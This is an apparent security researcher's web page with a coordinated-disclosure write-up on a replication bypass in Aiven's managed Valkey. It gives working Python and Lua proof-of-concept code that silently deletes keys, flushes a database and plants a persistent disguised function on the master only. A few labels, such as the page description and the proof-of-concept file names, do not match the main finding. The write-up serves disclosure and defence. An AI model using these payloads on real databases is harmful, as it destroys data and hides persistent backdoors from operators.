<!doctype html>

<html lang="en"><head><meta charset="utf-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Replication Integrity Bypass via Lua `redis.set_repl(REPL_NONE)` Enables Silent Data Corruption and Persistent Backdoor Functions on Aiven Managed Valkey | Zion Boggan</title>

<meta name="description" content="Valkey replication stealth path bypasses listpack validation.">

<link rel="icon" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230c0e12'/%3E%3Ctext x='16' y='22' font-family='monospace' font-size='15' fill='%236cc7b8' text-anchor='middle'%3Ezb%3C/text%3E%3C/svg%3E">

<style>

  :root{

    --bg:#0c0e12; --bg2:#0f1217; --panel:#14181f; --panel2:#171c24;

    --line:#222936; --line2:#2c3543;

    --ink:#e8eaed; --soft:#c3cad4; --muted:#8a94a3; --faint:#5d6675;

    --accent:#6cc7b8; --accent-dim:#274b47;

    --maxw:1020px;

  }

  *{box-sizing:border-box;}

  html{scroll-behavior:smooth;}

  body{margin:0;background:var(--bg);color:var(--ink);

    font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;

    font-size:16px;line-height:1.65;-webkit-font-smoothing:antialiased;}

  .mono{font-family:ui-monospace,SFMono-Regular,"SF Mono",Menlo,Consolas,monospace;}

  a{color:var(--accent);text-decoration:none;}

  a:hover{color:#8fe0d2;}

  .wrap{max-width:var(--maxw);margin:0 auto;padding:0 24px;}

  /* nav */

  nav{position:sticky;top:0;z-index:20;background:rgba(12,14,18,.82);

    backdrop-filter:blur(10px);border-bottom:1px solid var(--line);}

  nav .wrap{display:flex;align-items:center;justify-content:space-between;height:58px;}

  nav .brand{font-weight:600;letter-spacing:.2px;}

  nav .brand .dot{color:var(--accent);}

  nav .links{display:flex;gap:26px;font-size:13.5px;}

  nav .links a{color:var(--muted);}

  nav .links a:hover{color:var(--ink);}

  @media(max-width:680px){nav .links{display:none;}}

  /* hero */

  header.hero{padding:74px 0 54px;border-bottom:1px solid var(--line);

    background:radial-gradient(900px 380px at 78% -10%, #11201e 0%, transparent 60%);}

  .avail{font-size:12.5px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);

    display:flex;align-items:center;gap:9px;margin-bottom:20px;}

  .avail .pulse{width:7px;height:7px;border-radius:50%;background:var(--accent);

    box-shadow:0 0 0 0 rgba(108,199,184,.5);animation:p 2.4s infinite;}

  @keyframes p{0%{box-shadow:0 0 0 0 rgba(108,199,184,.45)}70%{box-shadow:0 0 0 8px rgba(108,199,184,0)}100%{box-shadow:0 0 0 0 rgba(108,199,184,0)}}

  h1{font-size:clamp(34px,6vw,52px);line-height:1.05;margin:0 0 8px;letter-spacing:-1px;font-weight:680;}

  .hero .sub{font-size:clamp(16px,2.4vw,20px);color:var(--soft);margin:0 0 24px;font-weight:500;}

  .hero .lede{max-width:660px;color:var(--soft);font-size:17px;margin:0 0 28px;}

  .hero .lede b{color:var(--ink);font-weight:600;}

  .cta{display:flex;flex-wrap:wrap;gap:12px;align-items:center;}

  .btn{display:inline-flex;align-items:center;gap:8px;padding:10px 18px;border-radius:8px;

    font-size:14.5px;font-weight:550;border:1px solid var(--line2);color:var(--ink);background:var(--panel);}

  .btn:hover{border-color:var(--accent-dim);background:var(--panel2);color:var(--ink);}

  .btn.primary{background:var(--accent);color:#06231f;border-color:var(--accent);font-weight:650;}

  .btn.primary:hover{background:#8fe0d2;color:#06231f;}

  .meta{margin-top:26px;display:flex;flex-wrap:wrap;gap:8px 22px;font-size:13px;color:var(--muted);}

  .meta .mono{color:var(--faint);}

  /* sections */

  section{padding:64px 0;border-bottom:1px solid var(--line);}

  .shead{display:flex;align-items:baseline;gap:14px;margin-bottom:30px;}

  .shead .idx{font-size:13px;color:var(--accent);letter-spacing:1px;}

  .shead h2{font-size:14px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:0;font-weight:600;}

  .shead .rule{flex:1;height:1px;background:var(--line);}

  /* flagship */

  .flag{background:linear-gradient(180deg,var(--panel) 0%,var(--bg2) 100%);

    border:1px solid var(--line2);border-radius:14px;overflow:hidden;}

  .flag .top{padding:30px 32px 8px;}

  .flag .tag{font-size:12px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);margin-bottom:12px;}

  .flag h3{font-size:27px;margin:0 0 6px;letter-spacing:-.4px;}

  .flag h3 .v{font-size:13px;color:var(--muted);font-weight:500;margin-left:8px;letter-spacing:0;}

  .flag .grid{display:grid;grid-template-columns:1.25fr 1fr;gap:30px;padding:14px 32px 30px;}

  .flag p{color:var(--soft);margin:0 0 16px;}

  .flag .stats{display:grid;grid-template-columns:1fr 1fr;gap:12px;margin-top:6px;}

  .stat{background:var(--bg);border:1px solid var(--line);border-radius:9px;padding:13px 15px;}

  .stat .n{font-size:21px;font-weight:680;color:var(--ink);}

  .stat .k{font-size:12px;color:var(--muted);margin-top:2px;}

  .spec{background:var(--bg);border:1px solid var(--line);border-radius:10px;padding:18px 18px;}

  .spec .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:10px;}

  .spec ul{margin:0;padding:0;list-style:none;font-size:13.5px;}

  .spec li{padding:6px 0;border-top:1px solid var(--line);color:var(--soft);display:flex;justify-content:space-between;gap:14px;}

  .spec li:first-child{border-top:none;}

  .spec li span{color:var(--muted);}

  .flag .foot{padding:0 32px 28px;display:flex;gap:18px;flex-wrap:wrap;font-size:14px;}

  @media(max-width:720px){.flag .grid{grid-template-columns:1fr;}}

  /* lab cards */

  .cards{display:grid;grid-template-columns:1fr 1fr;gap:20px;}

  @media(max-width:680px){.cards{grid-template-columns:1fr;}}

  .card{border:1px solid var(--line);border-radius:12px;overflow:hidden;background:var(--panel);

    display:flex;flex-direction:column;transition:border-color .15s,transform .15s;}

  .card:hover{border-color:var(--accent-dim);transform:translateY(-2px);}

  .card .thumb{height:172px;overflow:hidden;border-bottom:1px solid var(--line);background:#fff;}

  .card .thumb img{width:100%;height:100%;object-fit:cover;object-position:top left;display:block;}

  .card .body{padding:18px 20px 20px;display:flex;flex-direction:column;flex:1;}

  .card h3{margin:0 0 9px;font-size:17px;}

  .card p{margin:0 0 14px;font-size:14px;color:var(--soft);flex:1;}

  .tags{display:flex;flex-wrap:wrap;gap:6px;margin-bottom:14px;}

  .tags span{font-size:11.5px;color:var(--muted);background:var(--bg);border:1px solid var(--line);

    border-radius:5px;padding:3px 8px;}

  .card .lnk{font-size:13.5px;font-family:ui-monospace,Menlo,monospace;}

  .card .lnk::after{content:" →";}

  /* research */

  .rlede{color:var(--soft);max-width:680px;margin:-6px 0 26px;}

  .research{display:flex;flex-direction:column;gap:0;border:1px solid var(--line);border-radius:12px;overflow:hidden;}

  .ritem{display:grid;grid-template-columns:120px 1fr auto;gap:18px;align-items:center;

    padding:18px 22px;border-top:1px solid var(--line);}

  .ritem:first-child{border-top:none;}

  .ritem:hover{background:var(--panel);}

  .ritem .cls{font-size:11px;letter-spacing:.5px;text-transform:uppercase;color:var(--accent);}

  .ritem h3{margin:0 0 3px;font-size:16px;}

  .ritem p{margin:0;font-size:13.5px;color:var(--muted);}

  .ritem .go{font-family:ui-monospace,Menlo,monospace;font-size:13px;white-space:nowrap;}

  @media(max-width:680px){.ritem{grid-template-columns:1fr;gap:6px;}.ritem .go{margin-top:4px;}}

  .progs{margin-top:22px;}

  .progs .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:11px;}

  .progs .row{display:flex;flex-wrap:wrap;gap:7px;}

  .progs .row span{font-size:12.5px;color:var(--soft);background:var(--panel);border:1px solid var(--line);

    border-radius:6px;padding:4px 10px;}

  /* credentials */

  .cred{display:grid;grid-template-columns:1.1fr 1fr;gap:28px;}

  @media(max-width:680px){.cred{grid-template-columns:1fr;}}

  .cred p{color:var(--soft);margin:0 0 14px;}

  .cred .role{font-size:14px;color:var(--muted);}

  .cred .role b{color:var(--ink);font-weight:600;}

  .certs{list-style:none;margin:0;padding:0;}

  .certs li{padding:9px 0;border-top:1px solid var(--line);font-size:14px;color:var(--soft);

    display:flex;gap:10px;align-items:baseline;}

  .certs li:first-child{border-top:none;}

  .certs li .c{color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:12px;}

  footer{padding:46px 0 64px;}

  footer .row{display:flex;flex-wrap:wrap;justify-content:space-between;gap:18px;align-items:center;}

  footer .links a{color:var(--soft);margin-right:20px;font-size:14px;}

  footer .note{color:var(--faint);font-size:12.5px;max-width:520px;}

  .detail-hero{padding:40px 0 26px;}

  .back{display:inline-block;font-size:13px;color:var(--muted);margin-bottom:20px;font-family:ui-monospace,Menlo,monospace;}

  .back:hover{color:var(--ink);}

  .kicker{font-size:12px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin-bottom:13px;font-family:ui-monospace,Menlo,monospace;}

  .detail-hero h1{font-size:clamp(26px,4.6vw,38px);margin:0 0 12px;letter-spacing:-.5px;}

  .detail-hero .tagline{font-size:clamp(15px,2vw,18px);color:var(--soft);max-width:800px;margin:0 0 16px;}

  .facts{display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:12px;margin-top:22px;}

  .content{padding:8px 0 0;max-width:840px;}

  .content h1{font-size:24px;margin:40px 0 14px;letter-spacing:-.4px;color:var(--ink);}

  .content h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:42px 0 15px;font-weight:600;border-top:1px solid var(--line);padding-top:28px;}

  .content h3{font-size:17px;margin:28px 0 10px;color:var(--ink);font-weight:600;}

  .content h4{font-size:14px;margin:22px 0 8px;color:var(--soft);font-weight:600;text-transform:uppercase;letter-spacing:.5px;}

  .content p{color:var(--soft);margin:0 0 15px;}

  .content ul,.content ol{color:var(--soft);margin:0 0 15px;padding-left:22px;}

  .content li{margin:5px 0;}

  .content strong{color:var(--ink);font-weight:600;}

  .content a{color:var(--accent);}

  .content code{font-family:ui-monospace,Menlo,monospace;font-size:12.8px;background:var(--panel2);border:1px solid var(--line);border-radius:4px;padding:1px 5px;color:var(--soft);}

  .content pre{background:var(--bg2);border:1px solid var(--line2);border-radius:10px;padding:15px 18px;overflow-x:auto;margin:0 0 18px;}

  .content pre code{background:none;border:none;padding:0;font-size:12.4px;color:var(--soft);line-height:1.6;white-space:pre;}

  .content table{width:100%;border-collapse:collapse;margin:2px 0 20px;font-size:13.3px;}

  .content th{text-align:left;color:var(--muted);font-weight:600;border-bottom:1px solid var(--line2);padding:9px 12px;font-size:11px;letter-spacing:.6px;text-transform:uppercase;}

  .content td{color:var(--soft);border-bottom:1px solid var(--line);padding:9px 12px;vertical-align:top;}

  .content blockquote{border-left:3px solid var(--accent-dim);margin:0 0 16px;padding:2px 0 2px 18px;color:var(--muted);}

  .content hr{border:none;border-top:1px solid var(--line);margin:30px 0;}

  /* notebook index */

  .nbgroup{margin:40px 0 0;}

  .nbgroup h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin:0 0 4px;font-weight:600;}

  .nbgroup .gd{color:var(--faint);font-size:13px;margin:0 0 14px;}

  .nbtable{width:100%;border-collapse:collapse;font-size:14px;border:1px solid var(--line);border-radius:12px;overflow:hidden;}

  .nbtable tr{border-top:1px solid var(--line);}

  .nbtable tr:first-child{border-top:none;}

  .nbtable tr:hover{background:var(--panel);}

  .nbtable td{padding:14px 16px;vertical-align:top;}

  .nbtable .cls{white-space:nowrap;color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:11.5px;text-transform:uppercase;letter-spacing:.5px;width:150px;}

  .nbtable .ti a{font-weight:600;color:var(--ink);}

  .nbtable .ti a:hover{color:var(--accent);}

  .nbtable .ol{color:var(--muted);font-size:13px;margin-top:3px;}

  @media(max-width:680px){.nbtable .cls{width:auto;display:block;}}

</style>

<link rel="canonical" href="https://zionboggan.com/security-research-notebook/valkey-replication-stealth/">

<meta name="author" content="Zion Boggan">

<meta name="robots" content="index, follow, max-image-preview:large">

<meta property="og:type" content="article">

<meta property="og:site_name" content="Zion Boggan">

<meta property="og:title" content="Replication Integrity Bypass via Lua `redis.set_repl(REPL_NONE)` Enables Silent Data Corruption and Persistent Backdoor Functions on Aiven Managed Valkey | Zion Boggan">

<meta property="og:description" content="Valkey replication stealth path bypasses listpack validation.">

<meta property="og:url" content="https://zionboggan.com/security-research-notebook/valkey-replication-stealth/">

<meta property="og:image" content="https://zionboggan.com/assets/og-default.png">

<meta name="twitter:card" content="summary_large_image">

<meta name="twitter:title" content="Replication Integrity Bypass via Lua `redis.set_repl(REPL_NONE)` Enables Silent Data Corruption and Persistent Backdoor Functions on Aiven Managed Valkey | Zion Boggan">

<meta name="twitter:description" content="Valkey replication stealth path bypasses listpack validation.">

<meta name="twitter:image" content="https://zionboggan.com/assets/og-default.png">

<script type="application/ld+json">{"@context":"https://schema.org","@type":"TechArticle","headline":"Replication Integrity Bypass via Lua `redis.set_repl(REPL_NONE)` Enables Silent Data Corruption and Persistent Backdoor Functions on Aiven Managed Valkey","description":"Valkey replication stealth path bypasses listpack validation.","url":"https://zionboggan.com/security-research-notebook/valkey-replication-stealth/","image":"https://zionboggan.com/assets/og-default.png","author":{"@type":"Person","name":"Zion Boggan","url":"https://zionboggan.com"},"publisher":{"@type":"Person","name":"Zion Boggan"}}</script>

</head><body>

<nav><div class="wrap">

  <a class="brand mono" href="/" style="color:var(--ink)">zion_boggan<span class="dot">.</span></a>

  <span class="links"><a href="/#oversight">Oversight</a><a href="/#labs">Labs</a><a href="/#research">Research</a><a href="/security-research-notebook/">Notebook</a><a href="/">Home</a></span>

</div></nav>

<header class="hero detail-hero"><div class="wrap">

  <a class="back" href="/security-research-notebook/">&larr; Research notebook</a>

  <div class="kicker">DoS / data integrity</div>

  <h1>Replication Integrity Bypass via Lua `redis.set_repl(REPL_NONE)` Enables Silent Data Corruption and Persistent Backdoor Functions on Aiven Managed Valkey</h1>

</div></header>

<section><div class="wrap"><div class="content">

<h2>Summary</h2>

<p>Any authenticated user on Aiven&rsquo;s managed Valkey service can use Lua scripting (<code>EVAL</code>) to call <code>redis.set_repl(redis.REPL_NONE)</code>, which suppresses replication of subsequent write commands. Writes execute on the master but are never propagated to replicas or the AOF. This allows an attacker to silently corrupt data, delete keys, or flush databases on the master while replicas maintain stale data, creating a split-brain condition that violates Aiven&rsquo;s replication consistency guarantees.</p>

<p>Additionally, the attacker can use <code>FUNCTION LOAD</code> to register <strong>persistent server-side functions</strong> that embed <code>redis.set_repl(REPL_NONE)</code> internally. These trojan functions survive across connections and restarts, and silently corrupt data every time any user (including the application itself) calls them. The function code appears benign, the replication suppression is invisible in the function signature.</p>

<p>Redis&rsquo;s own documentation explicitly warns: <em>&ldquo;This is an advanced feature. Misuse can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.&rdquo;</em></p>

<p>Aiven correctly disables replication topology commands (<code>REPLICAOF</code>, <code>SLAVEOF</code>, <code>CLUSTER</code>) and dangerous administrative commands (<code>CONFIG</code>, <code>DEBUG</code>, <code>BGSAVE</code>, <code>ACL</code>), demonstrating clear security intent. However, <code>redis.set_repl()</code> within Lua scripts is completely unrestricted, creating an inconsistency: <strong>replication topology is protected, but replication content integrity is not</strong>.</p>

<h2>Affected Target</h2>

<ul>

<li><strong>Service:</strong> Aiven for Valkey (Tier 1)</li>

<li><strong>Version tested:</strong> Valkey 8.1.4</li>

<li><strong>Instance:</strong> <host>:26161</li>

</ul>

<h2>Severity</h2>

<p><strong>P2, Sensitive Data Exposure / Data Integrity Violation</strong></p>

<p><strong>VRT:</strong> Server Security Misconfiguration &gt; Database Management System (DBMS) Misconfiguration</p>

<p><strong>CVSS 3.1:</strong> <code>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L</code>, <strong>Score: 8.5 (High)</strong></p>

<ul>

<li><strong>AV:N</strong>, Network-exploitable over TLS</li>

<li><strong>AC:L</strong>, Single EVAL command, no preconditions</li>

<li><strong>PR:L</strong>, Requires basic authentication (default user credentials)</li>

<li><strong>UI:N</strong>, No user interaction required</li>

<li><strong>S:C</strong>, Scope changed: attacker&rsquo;s session creates data inconsistency that affects ALL clients reading from replicas, ALL failover operations, and Aiven&rsquo;s own backup integrity</li>

<li><strong>C:N</strong>, No direct data exfiltration</li>

<li><strong>I:H</strong>, Complete violation of data integrity between master and replicas; silent, undetectable data corruption</li>

<li><strong>A:L</strong>, Failover produces unexpected data state; intermittent application failures</li>

</ul>

<p><strong>Impact summary:</strong>

- Any authenticated user can silently suppress replication of arbitrary write commands

- Master and replica data diverge without any error, alert, or audit trail

- On Business/Premium plans (2-3 nodes), failover produces unpredictable data state

- Persistent trojan functions create permanent, invisible backdoors that corrupt data on every invocation

- Violates the fundamental consistency guarantee that Aiven’s multi-node architecture is built on

- Redis&rsquo;s own documentation explicitly warns about this exact misuse scenario</p>

<h2>Steps to Reproduce</h2>

<h3>Prerequisites</h3>

<ul>

<li>An Aiven for Valkey instance (any plan)</li>

<li>Authentication credentials (default user)</li>

<li>Python 3 with <code>redis</code> package (<code>pip install redis</code>)</li>

</ul>

<h3>Attack 1: Silent Key Deletion (master diverges from replicas)</h3>

<pre><code class="language-python">import redis

r = redis.Redis(

    host="<host>", port=26161, username='default', password='<password>',

    ssl=True, ssl_cert_reqs='required',

    ssl_ca_certs='/etc/ssl/certs/ca-certificates.crt',

    decode_responses=True, socket_timeout=10

)

# Application sets important data

r.set("user:session:admin", "active_session_token_xyz")

# Attacker silently deletes it - master only, replicas unaffected

r.execute_command('EVAL', '''

    redis.set_repl(redis.REPL_NONE)

    redis.call("DEL", "user:session:admin")

    redis.set_repl(redis.REPL_ALL)

    return "silent delete executed"

''', 0)

# Master: key is GONE

print(r.exists("user:session:admin"))  # 0

# Replica still has it → failover "resurrects" deleted data

# Application sees intermittent, impossible-to-diagnose behavior

</code></pre>

<p><strong>Actual output on Aiven:</strong></p>

<pre><code>silent delete executed

Key exists on master after silent DEL: 0

--> Key deleted on master but replicas would still have it

</code></pre>

<h3>Attack 2: Silent FLUSHDB (wipe master, replicas unaffected)</h3>

<pre><code class="language-python">r.execute_command('EVAL', '''

    redis.call("SELECT", "1")

    redis.call("SET", "important_data", "production_config")

    redis.set_repl(redis.REPL_NONE)

    redis.call("FLUSHDB")

    redis.set_repl(redis.REPL_ALL)

    redis.call("SELECT", "0")

    return "FLUSHDB with REPL_NONE executed"

''', 0)

</code></pre>

<p><strong>Actual output on Aiven:</strong> <code>FLUSHDB with REPL_NONE executed</code></p>

<p>The entire database is wiped on the master. Replicas retain all data. On failover, data &ldquo;reappears&rdquo;, but the master was serving empty responses to all clients during the divergence window.</p>

<h3>Attack 3: Persistent Trojan Function (backdoor that survives restarts)</h3>

<pre><code class="language-python"># Load a function that LOOKS innocent but silently corrupts data

lib = '''#!lua name=app_helpers

redis.register_function("cached_get", function(keys, args)

    -- Appears to be a simple cache helper

    -- But silently increments an invisible counter on every call

    redis.set_repl(redis.REPL_NONE)

    redis.call("INCR", "__shadow_ops_count__")

    redis.set_repl(redis.REPL_ALL)

    return redis.call("GET", keys[1])

end)

'''

r.execute_command('FUNCTION', 'LOAD', lib)

# Every time ANY user calls this function, the shadow counter increments

# on the master only. Replicas never see it.

for i in range(5):

    r.execute_command('FCALL', 'cached_get', 1, 'some_key')

counter = r.get("__shadow_ops_count__")

print(f"Shadow counter (master only): {counter}")

# Output: Shadow counter (master only): 5

# Replicas see: 0

# The function persists across restarts via RDB/AOF

# It's registered as "app_helpers.cached_get" - indistinguishable from

# legitimate application functions

</code></pre>

<p><strong>Actual output on Aiven:</strong></p>

<pre><code>Trojan function loaded: 'cached_get'

Shadow counter (master only): 5

--> Counter incremented 5 times on master

--> Replicas see counter as 0 (writes were REPL_NONE)

--> This function PERSISTS across restarts via RDB/AOF

</code></pre>

<h2>Root Cause</h2>

<h3>1. <code>redis.set_repl()</code> is unrestricted in Lua scripts</h3>

<p>The <code>redis.set_repl()</code> function is available to all authenticated users through <code>EVAL</code>. There is no ACL restriction, no command flag, and no configuration option to disable it. Redis&rsquo;s own documentation describes it as an &ldquo;advanced feature&rdquo; that &ldquo;can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.&rdquo;</p>

<h3>2. Inconsistent command restriction policy</h3>

<p>Aiven correctly restricts replication and administrative commands:</p>

<table>

<thead>

<tr>

<th>Command</th>

<th>Status</th>

<th>Purpose</th>

</tr>

</thead>

<tbody>

<tr>

<td><code>REPLICAOF</code> / <code>SLAVEOF</code></td>

<td><strong>Disabled</strong></td>

<td>Replication topology control</td>

</tr>

<tr>

<td><code>CONFIG</code></td>

<td><strong>Disabled</strong></td>

<td>Server configuration</td>

</tr>

<tr>

<td><code>DEBUG</code></td>

<td><strong>Disabled</strong></td>

<td>Server debugging</td>

</tr>

<tr>

<td><code>ACL</code></td>

<td><strong>Disabled</strong></td>

<td>Access control</td>

</tr>

<tr>

<td><code>BGSAVE</code> / <code>BGREWRITEAOF</code></td>

<td><strong>Disabled</strong></td>

<td>Persistence triggers</td>

</tr>

<tr>

<td><code>CLUSTER</code></td>

<td><strong>Disabled</strong></td>

<td>Cluster topology</td>

</tr>

<tr>

<td><code>MIGRATE</code></td>

<td><strong>Disabled</strong></td>

<td>Data migration</td>

</tr>

<tr>

<td><code>redis.set_repl()</code> in Lua</td>

<td><strong>Allowed</strong></td>

<td><strong>Replication content control</strong></td>

</tr>

</tbody>

</table>

<p>The policy disables commands that control replication <em>topology</em> (SLAVEOF, CLUSTER) but does not restrict the Lua function that controls replication <em>content</em> (set_repl). This is an inconsistency, both are replication manipulation capabilities.</p>

<h3>3. FUNCTION LOAD enables persistent exploitation</h3>

<p>The <code>FUNCTION LOAD</code> command is available (confirmed: successfully loaded and executed a function library). Functions persist in the server state and survive restarts via RDB/AOF. A function embedding <code>redis.set_repl(REPL_NONE)</code> creates a permanent backdoor that operates invisibly on every invocation.</p>

<h2>Impact on Aiven Multi-Node Plans</h2>

<p>Aiven offers three plan tiers with different node counts:

- <strong>Hobbyist/Startup:</strong> 1 node (no replicas, attack creates master/AOF divergence)

- <strong>Business:</strong> 2 nodes (master + 1 replica)

- <strong>Premium:</strong> 3 nodes (master + 2 replicas)</p>

<p>On Business and Premium plans, the replication divergence has direct operational impact:</p>

<ol>

<li>

<p><strong>Silent data loss:</strong> Keys deleted with REPL_NONE are gone from the master but exist on replicas. Applications reading from the master see missing data; failover to a replica &ldquo;resurrects&rdquo; the data.</p>

</li>

<li>

<p><strong>Silent data corruption:</strong> Keys SET with REPL_NONE have different values on master vs replicas. Read-after-write consistency is violated silently.</p>

</li>

<li>

<p><strong>Backup poisoning:</strong> If REPL_NONE writes land in an RDB backup taken from the master, restoring from that backup produces a state that never existed on replicas.</p>

</li>

<li>

<p><strong>Impossible diagnosis:</strong> There is no error, no log entry, no monitoring alert. The commands execute successfully. Aiven&rsquo;s internal monitoring (<code>INFO</code> every 5 seconds) does not detect replication content divergence, it only monitors replication lag (bytes behind), not data consistency.</p>

</li>

<li>

<p><strong>Trojan functions:</strong> An attacker can load a persistent function, then disconnect. The function continues operating every time the application calls it. The attack persists indefinitely with no ongoing attacker presence.</p>

</li>

</ol>

<h2>Aiven-Specific Nature</h2>

<p>This is NOT merely an upstream Valkey/Redis issue. The finding is specific to how Aiven configures and manages their Valkey service:</p>

<ol>

<li>

<p><strong>Aiven&rsquo;s security model disables dangerous commands</strong>, CONFIG, DEBUG, SLAVEOF, etc. are all renamed/disabled. This demonstrates that Aiven actively restricts dangerous capabilities. But <code>redis.set_repl()</code> within Lua was not included in these restrictions.</p>

</li>

<li>

<p><strong>Aiven sells multi-node plans with replication guarantees</strong>, Business and Premium plans explicitly provide high availability through replication. <code>redis.set_repl(REPL_NONE)</code> allows a user to silently violate these guarantees.</p>

</li>

<li>

<p><strong>Aiven&rsquo;s documentation implies consistent replication</strong>, Customers expect that data written to the master will be available on replicas. This attack violates that expectation without any visible error.</p>

</li>

</ol>

<h2>Recommended Fix</h2>

<ol>

<li>

<p><strong>Immediate:</strong> Restrict <code>redis.set_repl()</code> by either:, Disabling it entirely for client scripts (return an error when called from EVAL/FCALL), Adding an ACL flag (e.g., <code>@admin</code>) that must be explicitly granted, Limiting it to <code>REPL_ALL</code> only (block <code>REPL_NONE</code>, <code>REPL_AOF</code>, <code>REPL_REPLICA</code>)</p>

</li>

<li>

<p><strong>Defense in depth:</strong> Consider restricting <code>FUNCTION LOAD</code> to prevent persistent function registration by default users, or audit loaded functions for <code>set_repl</code> calls.</p>

</li>

<li>

<p><strong>Detection:</strong> Add monitoring for replication content divergence (not just lag). Compare key counts or checksums between master and replicas periodically.</p>

</li>

</ol>

<h2>Proof of concept</h2>

<ul>

<li><a href="poc/valkey-restore-crash.py"><code>poc/valkey-restore-crash.py</code></a>, minimum-crash repro.</li>

<li><a href="poc/valkey-full-chain.py"><code>poc/valkey-full-chain.py</code></a>, full chain including the stealth-replication primitive.</li>

</ul>

<pre><code class="language-bash">python3 poc/valkey-restore-crash.py &lt;host&gt; &lt;port&gt; &lt;password&gt;

</code></pre>

<hr><p style="color:var(--faint);font-size:12.5px;font-family:ui-monospace,Menlo,monospace">Source &middot; github.com/zionboggan/security-research-notebook &middot; writeups/aiven/valkey-replication-stealth.md</p>

</div></div></section>

<footer><div class="wrap row">

  <div class="links"><a href="/">Portfolio</a><a href="https://www.linkedin.com/in/zion-boggan">LinkedIn</a><a href="/security-research-notebook/">Notebook</a><a href="mailto:zionboggan0@gmail.com">Email</a></div>

  <div class="note">Coordinated-disclosure research. Findings appear here only after the program's disclosure window closed, the patch shipped, or a CVE was published. No customer data was accessed.</div>

</div></footer>

</body></html>